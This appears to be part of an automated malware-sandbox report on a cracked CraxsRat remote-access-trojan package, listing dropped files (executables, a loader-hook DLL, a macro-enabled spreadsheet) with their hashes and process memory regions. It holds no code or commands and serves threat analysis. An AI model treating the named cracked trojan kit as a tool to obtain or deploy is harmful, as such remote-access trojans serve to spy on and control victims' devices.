                                                                                                                                    SHA256

                                                                                                                                    b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                    SHA512

                                                                                                                                    bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1CA85E00

                                                                                                                                    Filesize

                                                                                                                                    28KB

                                                                                                                                    MD5

                                                                                                                                    25f2fbf785a8654c4c33a1acb7c6ec04

                                                                                                                                    SHA1

                                                                                                                                    8e4657f4b99e98c67f37a955476f6bd04c78939c

                                                                                                                                    SHA256

                                                                                                                                    c71046d7ef6047eb0bcbe0c5e495e75012a0d8df3b22e93895bdae2088fe49ab

                                                                                                                                    SHA512

                                                                                                                                    be428dc089e352c2694c7ed86bd74a1040a63b4ca4b934e08eae52b1570c4738f6c6892f2989fe0f437c8a7720c323efd12cea7c48b20073e93c7a3c9335d98e

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Costura\CFA0B0B143E4C50194769B9A2552FFEF\32\extremedumper.loaderhook.dll

                                                                                                                                    Filesize

                                                                                                                                    165KB

                                                                                                                                    MD5

                                                                                                                                    666bb02763fe5ceb4fff36db4d5cefad

                                                                                                                                    SHA1

                                                                                                                                    674045a63f4e7bec9312043a77e0f47b7009acb7

                                                                                                                                    SHA256

                                                                                                                                    8b8c972255f75488d0b562df4df6a281d52911e39ceeb43e05801b4658ff358d

                                                                                                                                    SHA512

                                                                                                                                    484acddf07c4e5cca74cb728da4b34cfaa8df2b68f04880dfdef70ec708bc687976702a18703a814aa812f6e1312a45e7ee7ee7ec51dc365268208afb20f9127

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b3ao1iz0.1t1.ps1

                                                                                                                                    Filesize

                                                                                                                                    60B

                                                                                                                                    MD5

                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                    SHA1

                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                    SHA256

                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                    SHA512

                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\aY3kwG5T.xlsm

                                                                                                                                    Filesize

                                                                                                                                    17KB

                                                                                                                                    MD5

                                                                                                                                    e566fc53051035e1e6fd0ed1823de0f9

                                                                                                                                    SHA1

                                                                                                                                    00bc96c48b98676ecd67e81a6f1d7754e4156044

                                                                                                                                    SHA256

                                                                                                                                    8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

                                                                                                                                    SHA512

                                                                                                                                    a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

                                                                                                                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\2lz.exe

                                                                                                                                    Filesize

                                                                                                                                    54KB

                                                                                                                                    MD5

                                                                                                                                    8890295834fee9bad1bdf144ecf7509e

                                                                                                                                    SHA1

                                                                                                                                    8979f0868013bdaf9fcb0a2a24a9e18543dbef7d

                                                                                                                                    SHA256

                                                                                                                                    b17a54bdfc1e68c4cdc6ce9fea908f77b765c89987b3fc0da29a41bd46849b1b

                                                                                                                                    SHA512

                                                                                                                                    da5f272c8f18999463976e35bb030ad71d94f8963f69638152833c49bf0454d9fe1e9e65b3035df47b02b9b9da4ff65efebe57ce64a5c018a99c033dc61a08ed

                                                                                                                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\System.exe

                                                                                                                                    Filesize

                                                                                                                                    792KB

                                                                                                                                    MD5

                                                                                                                                    33d0b045786db28a963d54d18d5a62c8

                                                                                                                                    SHA1

                                                                                                                                    a9c35481ca5176ab7cf61958644839353b625da4

                                                                                                                                    SHA256

                                                                                                                                    20508fdce67a08994be0f3f5bfd320daa547ce60f9b37224a957edff5de43f38

                                                                                                                                    SHA512

                                                                                                                                    80bbb8d4a3c0ebc9a3fd72a3d29cf5566ac4753f3b34cf9d1cdfc2f5536d2533a1d357d1071c413b83760c20cdc1af368f77e6d17f35ec26892c141f7cb1f2d8

                                                                                                                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\res\Lib\7z.exe

                                                                                                                                    Filesize

                                                                                                                                    1.0MB

                                                                                                                                    MD5

                                                                                                                                    c90af375bc40d0506c16b4ed75efccb6

                                                                                                                                    SHA1

                                                                                                                                    cd29f79b128ba67bc30e44e7a0365c5ffd3be376

                                                                                                                                    SHA256

                                                                                                                                    c6e3aa8b8b76b9e3b9df71b3f31d1b7a23f2a031099aceb68c39f38945b65dc0

                                                                                                                                    SHA512

                                                                                                                                    f0f9e9f6d92ebf20a5303be38e41f66fd052141f04db14ad1d30c974a4e4e70abd51340fe92658563bdb6a7587d9117883241de5bdd123a6e259123869dbabaa

                                                                                                                                  • C:\Users\Admin\Desktop\CraxsRat 7.4 Cracked\res\Lib\aapt.exe

                                                                                                                                    Filesize

                                                                                                                                    2.3MB

                                                                                                                                    MD5

                                                                                                                                    380095ec86872cfcab1e1031a16e4750

                                                                                                                                    SHA1

                                                                                                                                    bd5b040d47d16b7847174f9a5ce88732c87aa400

                                                                                                                                    SHA256

                                                                                                                                    7f79865298d3abf371d496a29ad9ae1176d52cebd1635d05ef6d87fb770a6989

                                                                                                                                    SHA512

                                                                                                                                    7aea4411b7892701dc31a980df8b0331804e3206f72dff5f8dba940b4e6250e85181a6c66b78112ba5c835947b223db81f19443f0fc4292d1e605872d1a47201

                                                                                                                                  • C:\Users\Admin\Desktop\ExtremeDumper-x86.exe

                                                                                                                                    Filesize

                                                                                                                                    1.3MB

                                                                                                                                    MD5

                                                                                                                                    d662f3f3ac67c211e2bafbef223adde4

                                                                                                                                    SHA1

                                                                                                                                    aa89a3b2a6322e50c278dc3e7535be4c47cd42ce

                                                                                                                                    SHA256

                                                                                                                                    b15577c40056691b489b04d9f685df341c8a079c19b6d643c6202949866d001a

                                                                                                                                    SHA512

                                                                                                                                    c66bc366250569235015f01181c09b3b4933c39d0dfc4b968bfaf0c2279c426b13c3d0b423a74da4a3a4cd8ec10182a9b2d9f0e701099a76fdaa79ac31f730f1

                                                                                                                                  • C:\Users\Admin\Desktop\ExtremeDumper.exe

                                                                                                                                    Filesize

                                                                                                                                    1.7MB

                                                                                                                                    MD5

                                                                                                                                    58db100b228ff17f83726d4c2738990e

                                                                                                                                    SHA1

                                                                                                                                    d69bfa9ddb32de1999760e8b3b3236bc8934d66c

                                                                                                                                    SHA256

                                                                                                                                    f407b67a008fc2186329d5feffe830f7eead7a11f3b169d0d90099495edfcf2e

                                                                                                                                    SHA512

                                                                                                                                    e845a62e00fcb8305ab0ceececec73a2d46a490c04370742290398f5e568ba4cf43bc1caa0529405e9ee07c021a05109873271278a8c45eec67ad409dd670f51

                                                                                                                                  • memory/236-1660-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/764-1327-0x00007FFF65DB0000-0x00007FFF65DC0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/764-1326-0x00007FFF65DB0000-0x00007FFF65DC0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/764-1324-0x00007FFF65DB0000-0x00007FFF65DC0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/764-1325-0x00007FFF65DB0000-0x00007FFF65DC0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/764-1323-0x00007FFF65DB0000-0x00007FFF65DC0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/764-1328-0x00007FFF63B90000-0x00007FFF63BA0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/764-1329-0x00007FFF63B90000-0x00007FFF63BA0000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/1080-1744-0x0000000005F80000-0x0000000005FCC000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    304KB

                                                                                                                                  • memory/1080-1763-0x0000000005EA0000-0x0000000005EBA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    104KB

                                                                                                                                  • memory/1080-1762-0x0000000007130000-0x00000000077AA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    6.5MB

                                                                                                                                  • memory/1080-1743-0x00000000059F0000-0x0000000005A0E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    120KB

                                                                                                                                  • memory/1080-1731-0x0000000005540000-0x0000000005897000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    3.3MB

                                                                                                                                  • memory/1080-1673-0x0000000004C30000-0x0000000004C52000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    136KB

                                                                                                                                  • memory/1080-1711-0x00000000054D0000-0x0000000005536000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    408KB

                                                                                                                                  • memory/1080-1710-0x0000000005460000-0x00000000054C6000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    408KB

                                                                                                                                  • memory/1080-1663-0x0000000004CC0000-0x00000000052EA000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    6.2MB

                                                                                                                                  • memory/1080-1662-0x0000000000D70000-0x0000000000DA6000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    216KB

                                                                                                                                  • memory/1216-1065-0x0000000007490000-0x00000000075B2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    1.1MB

                                                                                                                                  • memory/1216-1051-0x0000000006010000-0x00000000060A2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    584KB

                                                                                                                                  • memory/1216-1044-0x000000007459E000-0x000000007459F000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1216-1045-0x0000000000FD0000-0x0000000001116000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    1.3MB

                                                                                                                                  • memory/1216-1066-0x00000000075D0000-0x00000000075E6000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    88KB

                                                                                                                                  • memory/1216-1049-0x0000000005C60000-0x0000000005E0E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    1.7MB

                                                                                                                                  • memory/1216-1058-0x0000000074590000-0x0000000074D41000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/1216-1059-0x0000000006310000-0x0000000006336000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    152KB

                                                                                                                                  • memory/1216-1060-0x000000000B120000-0x000000000B130000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/1216-1061-0x0000000074590000-0x0000000074D41000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/1216-1062-0x000000007459E000-0x000000007459F000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                  • memory/1216-1063-0x0000000074590000-0x0000000074D41000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/1216-1057-0x0000000006300000-0x000000000630A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                  • memory/1216-1064-0x0000000074590000-0x0000000074D41000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/1216-1050-0x00000000065C0000-0x0000000006B66000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    5.6MB

                                                                                                                                  • memory/1216-1067-0x00000000075E0000-0x00000000076A8000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    800KB

                                                                                                                                  • memory/1216-1625-0x0000000074590000-0x0000000074D41000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    7.7MB

                                                                                                                                  • memory/1448-1782-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/1520-1767-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/1848-1768-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/2276-1659-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/2392-1766-0x0000000000400000-0x00000000004CC000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    816KB

                                                                                                                                  • memory/2872-1661-0x0000000000F30000-0x0000000000F38000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    32KB

                                                                                                                                  • memory/3552-1130-0x0000000000F10000-0x0000000000F1A000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    40KB

                                                                                                                                  • memory/3612-1761-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/3716-1787-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/3900-1733-0x0000000000400000-0x00000000004CC000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    816KB

                                                                                                                                  • memory/4520-1627-0x0000020988660000-0x000002098880E000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    1.7MB

                                                                                                                                  • memory/4652-1198-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/4688-1781-0x0000000004F80000-0x000000000501C000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    624KB

                                                                                                                                  • memory/4688-1732-0x0000000000620000-0x0000000000632000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    72KB

                                                                                                                                  • memory/4708-1788-0x0000000000400000-0x00000000004CC000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    816KB

                                                                                                                                  • memory/4752-1424-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/4752-1656-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB

                                                                                                                                  • memory/4752-1759-0x0000000000400000-0x0000000004AE9000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    70.9MB